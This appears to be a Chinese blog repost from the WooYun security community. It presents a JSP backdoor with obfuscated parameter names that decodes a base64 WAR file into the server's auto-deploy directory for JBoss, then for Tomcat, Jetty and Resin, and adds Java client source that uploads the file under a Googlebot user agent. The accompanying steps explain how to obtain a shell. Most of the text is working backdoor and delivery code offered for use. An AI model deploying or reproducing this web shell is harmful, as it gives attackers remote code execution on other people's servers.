- A+
所属分类:WooYun-Zone
在乌云社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法。
<%@page
import="java.io.*,
java.util.*,
sun.misc.BASE64Decoder"%>
<%
String PJdpj = "";
String pIGx = "";
String RSVw = System.getProperty("jboss.server.home.dir");
if (request.getParameter("pUBYyDsT") != null) {
try {
PJdpj = request.getParameter("pUBYyDsT");
pIGx = request.getParameter("oAEICWIo");
byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj);
String MfNJU = RSVw + "/deploy/" + pIGx + ".war";
FileOutputStream twkH = new FileOutputStream(MfNJU);
twkH.write(rFPE);
twkH.close();
} catch (Exception e) {
}
} else {
try {
String VBpM = request.getParameter("oAEICWIo");
String dhkDS = RSVw + "/deploy/" + VBpM + ".war";
new File(dhkDS).delete();
} catch (Exception e) {
}
}
%>
挺聪明的Server一般都提供了自动部署服务,也就是说只需要把war包放到默认能够自动部署的目录就行了。
POST提交:http://xxx.com/xxx.jsp
参数:
pUBYyDsT=war文件的Basr64编码&oAEICWIo=Test
然后请求http://xxx.com/Test就getshell了。Test是war文件的项目名。
只需简单的改改getProperty的属性值就能够通用到Tomcat等Server.
客户端工具:
源码:
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
String war = jTextField3.getText();
if(war!=null){
try {
FileInputStream fis = new FileInputStream(new File(war));
byte[] b = new byte[1024];
int n = 0;
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((n=fis.read(b))!=-1){
baos.write(b,0,n);
}
String content = new BASE64Encoder().encode(baos.toByteArray());
fis.close();
Map<String,String> map = new HashMap<String, String>();
map.put("oAEICWIo", jTextField2.getText());
map.put("pUBYyDsT", content);
Jsoup.connect(jTextField1.getText()).data(map).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(30000).post();
jTextArea1.setText("请求成功...");
} catch (Exception e) {
jTextArea1.setText(e.toString());
}
}
}
private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {
int result = 0;
String path = null;
JFileChooser fileChooser = new JFileChooser();
FileSystemView fsv = FileSystemView.getFileSystemView();
fileChooser.setCurrentDirectory(fsv.getHomeDirectory());
fileChooser.setDialogTitle("请选择war文件.");
fileChooser.setApproveButtonText("确定");
fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);
result = fileChooser.showOpenDialog(fileChooser);
if (JFileChooser.APPROVE_OPTION == result) {
path=fileChooser.getSelectedFile().getPath();
}
jTextField3.setText(path);
}
修改后的jsp后门:
<%@page import="java.io.*,java.util.*,sun.misc.BASE64Decoder"%>
<%!
String getServer(HttpServletRequest request,String name){
if(name.indexOf("jboss")!=-1){
return System.getProperty("jboss.server.home.dir")+"/deploy/";
}else if(name.indexOf("jetty")!=-1){
return System.getProperty("jetty.home")+"/webapps/";
}else if(name.indexOf("resin")!=-1){
return System.getProperty("resin.home")+"/webapps/";
}
return System.getProperty("catalina.home")+"/webapps/";
}
%>
<%
String PJdpj = request.getParameter("pUBYyDsT");
if (PJdpj!= null) {
try {
String RSVw = getServer(request, application.getServerInfo().toLowerCase()).replaceAll("\\\\", "/")+request.getParameter("oAEICWIo")+".war";
FileOutputStream twkH = new FileOutputStream(RSVw);
twkH.write(new BASE64Decoder().decodeBuffer(PJdpj));
twkH.close();
String dhkDS = RSVw+ ".war";
new File(dhkDS).delete();
} catch (Exception e) {
}
}
%>
- 我的微信
- 这是我的微信扫一扫
-
- 我的微信公众号
- 我的微信公众号扫一扫
-
